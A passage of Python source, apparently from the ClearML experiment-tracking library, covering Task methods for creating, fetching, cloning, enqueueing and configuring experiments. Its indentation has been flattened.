# if this is a subprocess, regardless of what the init was called for,
# we have to fix the main task hooks and stdout bindings
if cls.__forked_proc_main_pid != os.getpid() and cls.__is_subprocess():
if task_type is None:
task_type = cls.__main_task.task_type
# make sure we only do it once per process
cls.__forked_proc_main_pid = os.getpid()
# make sure we do not wait for the repo detect thread
cls.__main_task._detect_repo_async_thread = None
cls.__main_task._dev_worker = None
cls.__main_task._resource_monitor = None
# remove the logger from the previous process
cls.__main_task.get_logger()
# create a new logger (to catch stdout/err)
cls.__main_task._logger = None
cls.__main_task.__reporter = None
# noinspection PyProtectedMember
cls.__main_task._get_logger(auto_connect_streams=auto_connect_streams)
cls.__main_task._artifacts_manager = Artifacts(cls.__main_task)
# unregister signal hooks, they cause subprocess to hang
# noinspection PyProtectedMember
cls.__main_task.__register_at_exit(cls.__main_task._at_exit)
# TODO: Check if the signal handler method is safe enough, for the time being, do not unhook
# cls.__main_task.__register_at_exit(None, only_remove_signal_and_exception_hooks=True)
# start all reporting threads
BackgroundMonitor.start_all(task=cls.__main_task)
if not running_remotely():
verify_defaults_match()
return cls.__main_task
is_sub_process_task_id = None
# check that we are not a child process, in that case do nothing.
# we should not get here unless this is a Windows/macOS platform; Linux supports fork
if cls.__is_subprocess():
class _TaskStub(object):
def __call__(self, *args, **kwargs):
return self
def __getattr__(self, attr):
return self
def __setattr__(self, attr, val):
pass
is_sub_process_task_id = cls.__get_master_id_task_id()
# we could not find a task ID, revert to old stub behaviour
if not is_sub_process_task_id:
return _TaskStub() # noqa
elif running_remotely() and not get_is_master_node():
# make sure we only do it once per process
cls.__forked_proc_main_pid = os.getpid()
# make sure everyone understands we should act as if we are a subprocess (fake pid 1)
cls.__update_master_pid_task(pid=1, task=get_remote_task_id())
else:
# set us as master process (without task ID)
cls.__update_master_pid_task()
is_sub_process_task_id = None
if task_type is None:
# Backwards compatibility: if called from Task.current_task and task_type
# was not specified, keep legacy default value of TaskTypes.training
task_type = cls.TaskTypes.training
elif isinstance(task_type, six.string_types):
if task_type not in Task.TaskTypes.__members__:
raise ValueError("Task type '{}' not supported, options are: {}".format(
task_type, Task.TaskTypes.__members__.keys()))
task_type = Task.TaskTypes.__members__[str(task_type)]
try:
if not running_remotely():
# if this is the main process, create the task
if not is_sub_process_task_id:
task = cls._create_dev_task(
default_project_name=project_name,
default_task_name=task_name,
default_task_type=task_type,
tags=tags,
reuse_last_task_id=reuse_last_task_id,
continue_last_task=continue_last_task,
detect_repo=False if (
isinstance(auto_connect_frameworks, dict) and
not auto_connect_frameworks.get('detect_repository', True)) else True,
auto_connect_streams=auto_connect_streams,
)
# set defaults
if cls._offline_mode:
task.output_uri = None
elif output_uri:
task.output_uri = output_uri
elif cls.__default_output_uri:
task.output_uri = cls.__default_output_uri
# store new task ID
cls.__update_master_pid_task(task=task)
else:
# subprocess should get back the task info
task = cls.get_task(task_id=is_sub_process_task_id)
else:
# if this is the main process, create the task
if not is_sub_process_task_id:
task = cls(
private=cls.__create_protection,
task_id=get_remote_task_id(),
log_to_backend=False,
)
if cls.__default_output_uri and not task.output_uri:
task.output_uri = cls.__default_output_uri
# store new task ID
cls.__update_master_pid_task(task=task)
# make sure we are started
task.started(ignore_errors=True)
# continue last iteration if we had any
if task.data.last_iteration:
task.set_initial_iteration(int(task.data.last_iteration) + 1)
else:
# subprocess should get back the task info
task = cls.get_task(task_id=is_sub_process_task_id)
except Exception:
raise
else:
Task.__main_task = task
# register the main task for at exit hooks (there should only be one)
task.__register_at_exit(task._at_exit)
# always patch OS forking because of ProcessPool and the alike
PatchOsFork.patch_fork()
if auto_connect_frameworks:
is_auto_connect_frameworks_bool = not isinstance(auto_connect_frameworks, dict)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('hydra', True):
PatchHydra.update_current_task(task)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('jsonargparse', True):
PatchJsonArgParse.update_current_task(task)
if is_auto_connect_frameworks_bool or (
auto_connect_frameworks.get('scikit', True) and
auto_connect_frameworks.get('joblib', True)):
PatchedJoblib.update_current_task(task)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('matplotlib', True):
PatchedMatplotlib.update_current_task(Task.__main_task)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('tensorflow', True) \
or auto_connect_frameworks.get('tensorboard', True):
# allow to disable tfdefines
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('tfdefines', True):
PatchAbsl.update_current_task(Task.__main_task)
TensorflowBinding.update_current_task(
task,
patch_reporting=(is_auto_connect_frameworks_bool
or auto_connect_frameworks.get('tensorboard', True)),
patch_model_io=(is_auto_connect_frameworks_bool
or auto_connect_frameworks.get('tensorflow', True)),
)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('pytorch', True):
PatchPyTorchModelIO.update_current_task(task)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('megengine', True):
PatchMegEngineModelIO.update_current_task(task)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('xgboost', True):
PatchXGBoostModelIO.update_current_task(task)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('fastai', True):
PatchFastai.update_current_task(task)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('lightgbm', True):
PatchLIGHTgbmModelIO.update_current_task(task)
if auto_resource_monitoring and not is_sub_process_task_id:
resource_monitor_cls = auto_resource_monitoring \
if isinstance(auto_resource_monitoring, six.class_types) else ResourceMonitor
task._resource_monitor = resource_monitor_cls(
task, report_mem_used_per_process=not config.get(
'development.worker.report_global_mem_used', False))
task._resource_monitor.start()
# make sure all random generators are initialized with new seed
make_deterministic(task.get_random_seed())
if auto_connect_arg_parser:
EnvironmentBind.update_current_task(Task.__main_task)
# Patch ArgParser to be aware of the current task
argparser_update_currenttask(Task.__main_task)
# Patch Click
PatchClick.patch(Task.__main_task)
# set excluded arguments
if isinstance(auto_connect_arg_parser, dict):
task._arguments.exclude_parser_args(auto_connect_arg_parser)
# Check if parse args already called. If so, sync task parameters with parser
if argparser_parseargs_called():
for parser, parsed_args in get_argparser_last_args():
task._connect_argparse(parser=parser, parsed_args=parsed_args)
elif argparser_parseargs_called():
# actually we have nothing to do; when running remotely, the argparser will ignore
# all non-argparser parameters. The only caveat is a parameter connected with the same name
# as an argparser argument; this will be solved once sections are introduced to parameters
pass
# Make sure we start the logger, it will patch the main logging object and pipe all output
# if we are running locally and using development mode worker, we will pipe all stdout to logger.
# The logger will automatically take care of all patching (we just need to make sure to initialize it)
logger = task._get_logger(auto_connect_streams=auto_connect_streams)
# show the debug metrics page in the log, it is very convenient
if not is_sub_process_task_id:
if cls._offline_mode:
logger.report_text('ClearML running in offline mode, session stored in {}'.format(
task.get_offline_mode_folder()))
else:
logger.report_text('ClearML results page: {}'.format(task.get_output_log_web_page()))
# Make sure we start the dev worker if required, otherwise it will only be started when we write
# something to the log.
task._dev_mode_setup_worker()
if (not task._reporter or not task._reporter.is_alive()) and \
is_sub_process_task_id and not cls._report_subprocess_enabled:
task._setup_reporter()
# start monitoring in background process or background threads
# monitoring are: Resource monitoring and Dev Worker monitoring classes
BackgroundMonitor.start_all(task=task)
return task
@classmethod
def create(
cls,
project_name=None, # type: Optional[str]
task_name=None, # type: Optional[str]
task_type=None, # type: Optional[str]
repo=None, # type: Optional[str]
branch=None, # type: Optional[str]
commit=None, # type: Optional[str]
script=None, # type: Optional[str]
working_directory=None, # type: Optional[str]
packages=None, # type: Optional[Union[bool, Sequence[str]]]
requirements_file=None, # type: Optional[Union[str, Path]]
docker=None, # type: Optional[str]
docker_args=None, # type: Optional[str]
docker_bash_setup_script=None, # type: Optional[str]
argparse_args=None, # type: Optional[Sequence[Tuple[str, str]]]
base_task_id=None, # type: Optional[str]
add_task_init_call=True, # type: bool
):
# type: (...) -> Task
"""
Manually create and populate a new Task (experiment) in the system.
If the code does not already contain a call to ``Task.init``, pass add_task_init_call=True,
and the code will be patched in remote execution (i.e. when executed by `clearml-agent`).
.. note::
This method **always** creates a new Task.
Use :meth:`Task.init` method to automatically create and populate task for the running process.
To reference an existing Task, call the :meth:`Task.get_task` method.
:param project_name: Set the project name for the task. Required if base_task_id is None.
:param task_name: Set the name of the remote task. Required if base_task_id is None.
:param task_type: Optional, The task type to be created. Supported values: 'training', 'testing', 'inference',
'data_processing', 'application', 'monitor', 'controller', 'optimizer', 'service', 'qc', 'custom'
:param repo: Remote URL for the repository to use, or path to local copy of the git repository
Example: 'https://github.com/allegroai/clearml.git' or '~/project/repo'
:param branch: Select specific repository branch/tag (implies the latest commit from the branch)
:param commit: Select specific commit id to use (default: latest commit,
or when used with local repository matching the local commit id)
:param script: Specify the entry point script for the remote execution. When used in tandem with
remote git repository the script should be a relative path inside the repository,
for example: './source/train.py' . When used with local repository path it supports a
direct path to a file inside the local repository itself, for example: '~/project/source/train.py'
:param working_directory: Working directory to launch the script from. Default: repository root folder.
Relative to repo root or local folder.
:param packages: Manually specify a list of required packages. Example: ["tqdm>=2.1", "scikit-learn"]
or `True` to automatically create requirements
based on locally installed packages (repository must be local).
:param requirements_file: Specify requirements.txt file to install when setting the session.
If not provided, the requirements.txt from the repository will be used.
:param docker: Select the docker image to be executed in by the remote session
:param docker_args: Add docker arguments, pass a single string
:param docker_bash_setup_script: Add bash script to be executed
inside the docker before setting up the Task's environment
:param argparse_args: Arguments to pass to the remote execution, list of string pairs (argument, value)
Note: this is only supported if the codebase itself uses argparse.ArgumentParser
:param base_task_id: Use a pre-existing task in the system, instead of a local repo/script.
Essentially clones an existing task and overrides arguments/requirements.
:param add_task_init_call: If True, a 'Task.init()' call is added to the script entry point in remote execution.
:return: The newly created Task (experiment)
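For example, a minimal sketch (the repository URL, script path, and package list are placeholders):
.. code-block:: py
    task = Task.create(
        project_name='examples', task_name='remote experiment',
        repo='https://github.com/allegroai/clearml.git',
        script='./examples/train.py',
        packages=['clearml'],
    )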
"""
if not project_name and not base_task_id:
if not cls.__main_task:
raise ValueError("Please provide project_name, no global task context found "
"(Task.current_task hasn't been called)")
project_name = cls.__main_task.get_project_name()
from .backend_interface.task.populate import CreateAndPopulate
manual_populate = CreateAndPopulate(
project_name=project_name, task_name=task_name, task_type=task_type,
repo=repo, branch=branch, commit=commit,
script=script, working_directory=working_directory,
packages=packages, requirements_file=requirements_file,
docker=docker, docker_args=docker_args, docker_bash_setup_script=docker_bash_setup_script,
base_task_id=base_task_id,
add_task_init_call=add_task_init_call,
raise_on_missing_entries=False,
)
task = manual_populate.create_task()
if task and argparse_args:
manual_populate.update_task_args(argparse_args)
task.reload()
return task
@classmethod
def get_task(
cls,
task_id=None, # type: Optional[str]
project_name=None, # type: Optional[str]
task_name=None, # type: Optional[str]
tags=None, # type: Optional[Sequence[str]]
allow_archived=True, # type: bool
task_filter=None # type: Optional[dict]
):
# type: (...) -> "Task"
"""
Get a Task by Id, or project name / task name combination.
For example:
The following code demonstrates calling ``Task.get_task`` to report a scalar to another Task. The output
of :meth:`.Logger.report_scalar` from testing is associated with the Task named ``training``. It allows
training and testing to run concurrently, because they initialized different Tasks (see :meth:`Task.init`
for information about initializing Tasks).
The training script:
.. code-block:: py
# initialize the training Task
task = Task.init('myProject', 'training')
# do some training
The testing script:
.. code-block:: py
# initialize the testing Task
task = Task.init('myProject', 'testing')
# get the training Task
train_task = Task.get_task(project_name='myProject', task_name='training')
# report metrics in the training Task
for x in range(10):
train_task.get_logger().report_scalar('title', 'series', value=x * 2, iteration=x)
:param str task_id: The Id (system UUID) of the experiment to get.
If specified, ``project_name`` and ``task_name`` are ignored.
:param str project_name: The project name of the Task to get.
:param str task_name: The name of the Task within ``project_name`` to get.
:param list tags: Filter based on the requested list of tags (strings) (Task must have all the listed tags)
To exclude a tag add "-" prefix to the tag. Example: ["best", "-debug"]
:param bool allow_archived: Only applicable if a specific ``task_id`` is *not* used.
If True (default), archived Tasks may be returned; if False, archived Tasks are filtered out.
:param dict task_filter: Only applicable if a specific ``task_id`` is *not* used.
Pass additional query filters, on top of project/name. See details in Task.get_tasks.
:return: The Task specified by ID, or project name / experiment name combination.
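A Task can also be fetched directly by ID, or filtered by tags (the ID and tag values below are placeholders):
.. code-block:: py
    task = Task.get_task(task_id='aabbcc12deadbeef')
    best_task = Task.get_task(project_name='myProject', task_name='training', tags=['best', '-debug'])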
"""
return cls.__get_task(
task_id=task_id, project_name=project_name, task_name=task_name, tags=tags,
include_archived=allow_archived, task_filter=task_filter,
)
@classmethod
def get_tasks(
cls,
task_ids=None, # type: Optional[Sequence[str]]
project_name=None, # type: Optional[Union[Sequence[str],str]]
task_name=None, # type: Optional[str]
tags=None, # type: Optional[Sequence[str]]
task_filter=None # type: Optional[Dict]
):
# type: (...) -> List["Task"]
"""
Get a list of Task objects matching the queries/filters:
- A list of specific Task IDs.
- Filter Tasks based on specific fields:
project name (including partial match), task name (including partial match), tags
Apply Additional advanced filtering with `task_filter`
:param list(str) task_ids: The Ids (system UUID) of experiments to get.
If ``task_ids`` is specified, then ``project_name`` and ``task_name`` are ignored.
:param str project_name: The project name of the Tasks to get. To get the experiments
in all projects, use the default value of ``None``. (Optional)
Use a list of strings for multiple optional project names.
:param str task_name: The full name or partial name of the Tasks to match within the specified
``project_name`` (or all projects if ``project_name`` is ``None``).
This method supports regular expressions for name matching. If ``None`` is passed,
all Tasks within the project are returned. (Optional)
:param list tags: Filter based on the requested list of tags (strings) (Task must have all the listed tags)
To exclude a tag add "-" prefix to the tag. Example: ["best", "-debug"]
:param dict task_filter: filter and order Tasks. See service.tasks.GetAllRequest for details
`parent`: (str) filter by parent task-id matching
`search_text`: (str) free text search (in task fields comment/name/id)
`status`: List[str] List of valid statuses
(options are: "created", "queued", "in_progress", "stopped", "published", "completed")
`type`: List[str] List of valid task type
(options are: 'training', 'testing', 'inference', 'data_processing', 'application', 'monitor',
'controller', 'optimizer', 'service', 'qc', 'custom')
`user`: List[str] Filter based on Task's user owner, provide list of valid user Ids.
`order_by`: List[str] List of field names to order by. Use a '-' prefix to specify
descending order. Optional, recommended when using paging.
Example: order_by=['-last_update']
`_all_`: dict(fields=[], pattern='') Match string `pattern` (regular expression)
appearing in All `fields`
dict(fields=['script.repository'], pattern='github.com/user')
`_any_`: dict(fields=[], pattern='') Match string `pattern` (regular expression)
appearing in Any of the `fields`
dict(fields=['comment', 'name'], pattern='my comment')
Examples:
{'status': ['stopped'], 'order_by': ["-last_update"]}
{'order_by': ['-last_update'], '_all_': dict(fields=['script.repository'], pattern='github.com/user')}
:return: The Tasks specified by the parameter combinations (see the parameters).
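For example, a minimal sketch (the project name and filter values are placeholders):
.. code-block:: py
    tasks = Task.get_tasks(
        project_name='examples',
        task_name='experiment',  # partial name match
        task_filter={'status': ['completed'], 'order_by': ['-last_update']},
    )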
"""
return cls.__get_tasks(task_ids=task_ids, project_name=project_name, tags=tags,
task_name=task_name, **(task_filter or {}))
@classmethod
def query_tasks(
cls,
project_name=None, # type: Optional[Union[Sequence[str],str]]
task_name=None, # type: Optional[str]
tags=None, # type: Optional[Sequence[str]]
additional_return_fields=None, # type: Optional[Sequence[str]]
task_filter=None, # type: Optional[Dict]
):
# type: (...) -> Union[List[str], List[Dict[str, str]]]
"""
Get a list of Task IDs matching the specific query/filter.
Notice, if `additional_return_fields` is specified, returns a list of
dictionaries with requested fields (dict per Task)
:param str project_name: The project name of the Tasks to get. To get the experiments
in all projects, use the default value of ``None``. (Optional)
Use a list of strings for multiple optional project names.
:param str task_name: The full name or partial name of the Tasks to match within the specified
``project_name`` (or all projects if ``project_name`` is ``None``).
This method supports regular expressions for name matching. If ``None`` is passed,
all Tasks within the project are returned. (Optional)
:param list tags: Filter based on the requested list of tags (strings) (Task must have all the listed tags)
To exclude a tag add "-" prefix to the tag. Example: ["best", "-debug"]
:param list additional_return_fields: Optional, if not provided return a list of Task IDs.
If provided return dict per Task with the additional requested fields.
Example: additional_return_fields=['last_update', 'user', 'script.repository'] will return a list of dicts:
[{'id': 'task_id', 'last_update': datetime.datetime(),
'user': 'user_id', 'script.repository': 'https://github.com/user/'}, ]
:param dict task_filter: filter and order Tasks. See service.tasks.GetAllRequest for details
`parent`: (str) filter by parent task-id matching
`search_text`: (str) free text search (in task fields comment/name/id)
`status`: List[str] List of valid statuses
(options are: "created", "queued", "in_progress", "stopped", "published", "completed")
`type`: List[str] List of valid task type
(options are: 'training', 'testing', 'inference', 'data_processing', 'application', 'monitor',
'controller', 'optimizer', 'service', 'qc', 'custom')
`user`: List[str] Filter based on Task's user owner, provide list of valid user Ids.
`order_by`: List[str] List of field names to order by. Use a '-' prefix to specify
descending order. Optional, recommended when using paging.
Example: order_by=['-last_update']
`_all_`: dict(fields=[], pattern='') Match string `pattern` (regular expression)
appearing in All `fields`
dict(fields=['script.repository'], pattern='github.com/user')
`_any_`: dict(fields=[], pattern='') Match string `pattern` (regular expression)
appearing in Any of the `fields`
dict(fields=['comment', 'name'], pattern='my comment')
Examples:
{'status': ['stopped'], 'order_by': ["-last_update"]}
{'order_by': ['-last_update'], '_all_': dict(fields=['script.repository'], pattern='github.com/user')}
:return: A list of Task IDs, or a list of dictionaries (one per Task) if ``additional_return_fields`` is provided.
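For example, a minimal sketch (the project name, tag, and requested fields are placeholders):
.. code-block:: py
    task_info = Task.query_tasks(
        project_name='examples', tags=['best'],
        additional_return_fields=['last_update', 'user'],
    )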
"""
if tags:
task_filter = task_filter or {}
task_filter['tags'] = (task_filter.get('tags') or []) + list(tags)
return_fields = {}
if additional_return_fields:
task_filter = task_filter or {}
return_fields = set(list(additional_return_fields) + ['id'])
task_filter['only_fields'] = (task_filter.get('only_fields') or []) + list(return_fields)
results = cls._query_tasks(project_name=project_name, task_name=task_name, **(task_filter or {}))
return [t.id for t in results] if not additional_return_fields else \
[{k: cls._get_data_property(prop_path=k, data=r, raise_on_error=False, log_on_error=False)
for k in return_fields}
for r in results]
@property
def output_uri(self):
# type: () -> str
return self.storage_uri
@output_uri.setter
def output_uri(self, value):
# type: (Union[str, bool]) -> None
# check if this is boolean
if value is False:
value = None
elif value is True:
value = self.__default_output_uri or self._get_default_report_storage_uri()
# check if we have the correct packages / configuration
if value and value != self.storage_uri:
from .storage.helper import StorageHelper
helper = StorageHelper.get(value)
if not helper:
raise ValueError("Could not get access credentials for '{}' "
", check configuration file ~/clearml.conf".format(value))
helper.check_write_permissions(value)
self.storage_uri = value
@property
def artifacts(self):
# type: () -> Dict[str, Artifact]
"""
A read-only dictionary of Task artifacts (name, artifact).
:return: The artifacts.
"""
if not Session.check_min_api_version('2.3'):
return ReadOnlyDict()
artifacts_pairs = []
if self.data.execution and self.data.execution.artifacts:
artifacts_pairs = [(a.key, Artifact(a)) for a in self.data.execution.artifacts]
if self._artifacts_manager:
artifacts_pairs += list(self._artifacts_manager.registered_artifacts.items())
return ReadOnlyDict(artifacts_pairs)
@property
def models(self):
# type: () -> Mapping[str, Sequence[Model]]
"""
Read-only dictionary of the Task's loaded/stored models.
:return: A dictionary-like object with "input"/"output" keys and input/output properties, pointing to a
list-like object containing Model objects. Each list-like object also acts as a dictionary, mapping
model name to an appropriate model instance.
Get input/output models:
.. code-block:: py
task.models.input
task.models["input"]
task.models.output
task.models["output"]
Get the last output model:
.. code-block:: py
task.models.output[-1]
Get a model by name:
.. code-block:: py
task.models.output["model name"]
"""
return self.get_models()
@property
def logger(self):
# type: () -> Logger
"""
Get a Logger object for reporting, for this task context. You can view all Logger report output associated with
the Task for which this method is called, including metrics, plots, text, tables, and images, in the
**ClearML Web-App (UI)**.
:return: The Logger object for the current Task (experiment).
"""
return self.get_logger()
@classmethod
def clone(
cls,
source_task=None, # type: Optional[Union[Task, str]]
name=None, # type: Optional[str]
comment=None, # type: Optional[str]
parent=None, # type: Optional[str]
project=None, # type: Optional[str]
):
# type: (...) -> Task
"""
Create a duplicate (a clone) of a Task (experiment). The status of the cloned Task is ``Draft``
and modifiable.
Use this method to manage experiments and for autoML.
:param str source_task: The Task to clone. Specify a Task object or a Task ID. (Optional)
:param str name: The name of the new cloned Task. (Optional)
:param str comment: A comment / description for the new cloned Task. (Optional)
:param str parent: The Id of the parent Task of the new Task.
- If ``parent`` is not specified, then ``parent`` is set to ``source_task.parent``.
- If ``parent`` is not specified and ``source_task.parent`` is not available, then
``parent`` is set to ``source_task``.
:param str project: The Id of the project in which to create the new Task.
If ``None``, the new task inherits the original Task's project. (Optional)
:return: The new cloned Task (experiment).
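For example, a minimal sketch (the source Task ID and new name are placeholders):
.. code-block:: py
    cloned_task = Task.clone(source_task='aabbcc12deadbeef', name='cloned experiment')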
"""
assert isinstance(source_task, (six.string_types, Task))
if not Session.check_min_api_version('2.4'):
raise ValueError("ClearML-server does not support DevOps features, "
"upgrade clearml-server to 0.12.0 or above")
task_id = source_task if isinstance(source_task, six.string_types) else source_task.id
if not parent:
if isinstance(source_task, six.string_types):
source_task = cls.get_task(task_id=source_task)
parent = source_task.id if not source_task.parent else source_task.parent
elif isinstance(parent, Task):
parent = parent.id
cloned_task_id = cls._clone_task(cloned_task_id=task_id, name=name, comment=comment,
parent=parent, project=project)
cloned_task = cls.get_task(task_id=cloned_task_id)
return cloned_task
@classmethod
def enqueue(cls, task, queue_name=None, queue_id=None):
# type: (Union[Task, str], Optional[str], Optional[str]) -> Any
"""
Enqueue a Task for execution, by adding it to an execution queue.
.. note::
A worker daemon must be listening at the queue for the worker to fetch the Task and execute it,
see `Use Case Examples <../clearml_agent_ref/#use-case-examples>`_ on the "ClearML Agent
Reference" page.
:param Task/str task: The Task to enqueue. Specify a Task object or Task ID.
:param str queue_name: The name of the queue. If not specified, then ``queue_id`` must be specified.
:param str queue_id: The Id of the queue. If not specified, then ``queue_name`` must be specified.
:return: An enqueue JSON response.
.. code-block:: javascript
{
"queued": 1,
"updated": 1,
"fields": {
"status": "queued",
"status_reason": "",
"status_message": "",
"status_changed": "2020-02-24T15:05:35.426770+00:00",
"last_update": "2020-02-24T15:05:35.426770+00:00",
"execution.queue": "2bd96ab2d9e54b578cc2fb195e52c7cf"
}
}
- ``queued`` - The number of Tasks enqueued (an integer or ``null``).
- ``updated`` - The number of Tasks updated (an integer or ``null``).
- ``fields``
- ``status`` - The status of the experiment.
- ``status_reason`` - The reason for the last status change.
- ``status_message`` - Information about the status.
- ``status_changed`` - The last status change date and time (ISO 8601 format).
- ``last_update`` - The last Task update time, including Task creation, update, change, or events for
this task (ISO 8601 format).
- ``execution.queue`` - The Id of the queue where the Task is enqueued. ``null`` indicates not enqueued.
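For example, a minimal sketch (the queue name is a placeholder):
.. code-block:: py
    cloned_task = Task.clone(source_task=task, name='cloned experiment')
    Task.enqueue(task=cloned_task, queue_name='default')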
"""
assert isinstance(task, (six.string_types, Task))
if not Session.check_min_api_version('2.4'):
raise ValueError("ClearML-server does not support DevOps features, "
"upgrade clearml-server to 0.12.0 or above")
# make sure we have either name or id
mutually_exclusive(queue_name=queue_name, queue_id=queue_id)
task_id = task if isinstance(task, six.string_types) else task.id
session = cls._get_default_session()
if not queue_id:
queue_id = get_queue_id(session, queue_name)
if not queue_id:
raise ValueError('Could not find queue named "{}"'.format(queue_name))
req = tasks.EnqueueRequest(task=task_id, queue=queue_id)
res = cls._send(session=session, req=req)
if not res.ok():
raise ValueError(res.response)
resp = res.response
return resp
@classmethod
def dequeue(cls, task):
# type: (Union[Task, str]) -> Any
"""
Dequeue (remove) a Task from an execution queue.
:param Task/str task: The Task to dequeue. Specify a Task object or Task ID.
:return: A dequeue JSON response.
.. code-block:: javascript
{
"dequeued": 1,
"updated": 1,
"fields": {
"status": "created",
"status_reason": "",
"status_message": "",
"status_changed": "2020-02-24T16:43:43.057320+00:00",
"last_update": "2020-02-24T16:43:43.057320+00:00",
"execution.queue": null
}
}
- ``dequeued`` - The number of Tasks dequeued (an integer or ``null``).
- ``fields``
- ``status`` - The status of the experiment.
- ``status_reason`` - The reason for the last status change.
- ``status_message`` - Information about the status.
- ``status_changed`` - The last status change date and time in ISO 8601 format.
- ``last_update`` - The last time the Task was created, updated,
changed or events for this task were reported.
- ``execution.queue`` - The Id of the queue where the Task is enqueued. ``null`` indicates not enqueued.
- ``updated`` - The number of Tasks updated (an integer or ``null``).
"""
assert isinstance(task, (six.string_types, Task))
if not Session.check_min_api_version('2.4'):
raise ValueError("ClearML-server does not support DevOps features, "
"upgrade clearml-server to 0.12.0 or above")
task_id = task if isinstance(task, six.string_types) else task.id
session = cls._get_default_session()
req = tasks.DequeueRequest(task=task_id)
res = cls._send(session=session, req=req)
resp = res.response
return resp
def add_tags(self, tags):
# type: (Union[Sequence[str], str]) -> None
"""
Add Tags to this task. Old tags are not deleted. When executing a Task (experiment) remotely,
this method has no effect.
:param tags: A list of tags which describe the Task to add.
"""
if isinstance(tags, six.string_types):
tags = tags.split(" ")
self.data.tags = list(set((self.data.tags or []) + tags))
self._edit(tags=self.data.tags)
def connect(self, mutable, name=None):
# type: (Any, Optional[str]) -> Any
"""
Connect an object to a Task object. This connects an experiment component (part of an experiment) to the
experiment. For example, connect hyperparameters or models.
:param object mutable: The experiment component to connect. The object can be any object Task supports
integrating, including:
- argparse - An argparse object for parameters.
- dict - A dictionary for parameters.
- TaskParameters - A TaskParameters object.
- Model - A model object for initial model warmup, or for model update/snapshot uploading.
- Class type - A Class type, storing all class properties (excluding '_' prefix properties)
- Object - A class instance, storing all instance properties (excluding '_' prefix properties)
:param str name: A section name associated with the connected object. If 'name' is None, it defaults to 'General'.
Currently only supported for `dict` / `TaskParameters` objects.
Examples:
name='General' will put the connected dictionary under the General section in the hyper-parameters
name='Train' will put the connected dictionary under the Train section in the hyper-parameters
:return: The result returned when connecting the object, if supported.
:raise: Raise an exception on unsupported objects.
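For example, a minimal sketch connecting a hyperparameter dictionary (the parameter values are placeholders):
.. code-block:: py
    params = {'batch_size': 64, 'learning_rate': 0.001}
    params = task.connect(params, name='Train')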
"""
# dispatching by match order
dispatch = (
(OutputModel, self._connect_output_model),
(InputModel, self._connect_input_model),
(ArgumentParser, self._connect_argparse),
(dict, self._connect_dictionary),
(TaskParameters, self._connect_task_parameters),
(type, self._connect_object),
(object, self._connect_object),
)
multi_config_support = Session.check_min_api_version('2.9')
if multi_config_support and not name and not isinstance(mutable, (OutputModel, InputModel)):
name = self._default_configuration_section_name
if not multi_config_support and name and name != self._default_configuration_section_name:
raise ValueError("Multiple configurations is not supported with the current 'clearml-server', "
"please upgrade to the latest version")
for mutable_type, method in dispatch:
if isinstance(mutable, mutable_type):
return method(mutable, name=name)
raise Exception('Unsupported mutable type %s: no connect function found' % type(mutable).__name__)
def connect_configuration(self, configuration, name=None, description=None):
# type: (Union[Mapping, list, Path, str], Optional[str], Optional[str]) -> Union[dict, Path, str]
"""
Connect a configuration dictionary or configuration file (pathlib.Path / str) to a Task object.
This method should be called before reading the configuration file.
Later, when creating an output model, the model will include the contents of the configuration dictionary
or file.
For example, a local file:
.. code-block:: py
config_file = task.connect_configuration(config_file)
my_params = json.load(open(config_file,'rt'))
A parameter dictionary/list:
.. code-block:: py
my_params = task.connect_configuration(my_params)
:param configuration: The configuration. This is usually the configuration used in the model training process.
Specify one of the following:
- A dictionary/list - A dictionary containing the configuration. ClearML stores the configuration in
the **ClearML Server** (backend), in a HOCON format (JSON-like format) which is editable.
- A ``pathlib2.Path`` string - A path to the configuration file. ClearML stores the content of the file.
A local path must be a relative path. When executing a Task remotely in a worker, the contents brought
from the **ClearML Server** (backend) overwrite the contents of the file.
:param str name: Configuration section name (default: 'General').
Allows users to store multiple configuration dicts/files.
:param str description: Configuration section description (text). default: None
:return: If a dictionary is specified, then a dictionary is returned. If a pathlib2.Path / string is
specified, then a path to a local configuration file is returned.
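For example, a named configuration section (the section name and file path are placeholders):
.. code-block:: py
    config_file = task.connect_configuration('model_config.yaml', name='model config')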
"""
pathlib_Path = None # noqa
if not isinstance(configuration, (dict, list, Path, six.string_types)):
try:
from pathlib import Path as pathlib_Path # noqa
except ImportError:
pass
if not pathlib_Path or not isinstance(configuration, pathlib_Path):
raise ValueError("connect_configuration supports `dict`, `str` and 'Path' types, "
"{} is not supported".format(type(configuration)))
multi_config_support = Session.check_min_api_version('2.9')
if multi_config_support and not name:
name = self._default_configuration_section_name
if not multi_config_support and name and name != self._default_configuration_section_name:
raise ValueError("Multiple configurations is not supported with the current 'clearml-server', "
"please upgrade to the latest version")
# parameter dictionary
if isinstance(configuration, (dict, list,)):
def _update_config_dict(task, config_dict):
if multi_config_support:
# noinspection PyProtectedMember
task._set_configuration(
name=name, description=description, config_type='dictionary', config_dict=config_dict)
else:
# noinspection PyProtectedMember
task._set_model_config(config_dict=config_dict)
if not running_remotely() or not (self.is_main_task() or self._is_remote_main_task()):
if multi_config_support:
self._set_configuration(
name=name, description=description, config_type='dictionary', config_dict=configuration)
else:
self._set_model_config(config_dict=configuration)
if isinstance(configuration, dict):
configuration = ProxyDictPostWrite(self, _update_config_dict, **configuration)
else:
# noinspection PyBroadException
try:
remote_configuration = self._get_configuration_dict(name=name) \
if multi_config_support else self._get_model_config_dict()
except Exception:
remote_configuration = None
if remote_configuration is None:
LoggerRoot.get_base_logger().warning(
"Could not retrieve remote configuration named \'{}\'\n"
"Using default configuration: {}".format(name, str(configuration)))
# update back configuration section
if multi_config_support:
self._set_configuration(
name=name, description=description,
config_type='dictionary', config_dict=configuration)
return configuration
if isinstance(configuration, dict):
configuration.clear()
configuration.update(remote_configuration)
configuration = ProxyDictPreWrite(False, False, **configuration)
elif isinstance(configuration, list):
configuration.clear()
configuration.extend(remote_configuration)
return configuration
# it is a path to a local file
if not running_remotely() or not (self.is_main_task() or self._is_remote_main_task()):
# check if not absolute path
configuration_path = Path(configuration)
if not configuration_path.is_file():
ValueError("Configuration file does not exist")
try:
with open(configuration_path.as_posix(), 'rt') as f:
configuration_text = f.read()
except Exception:
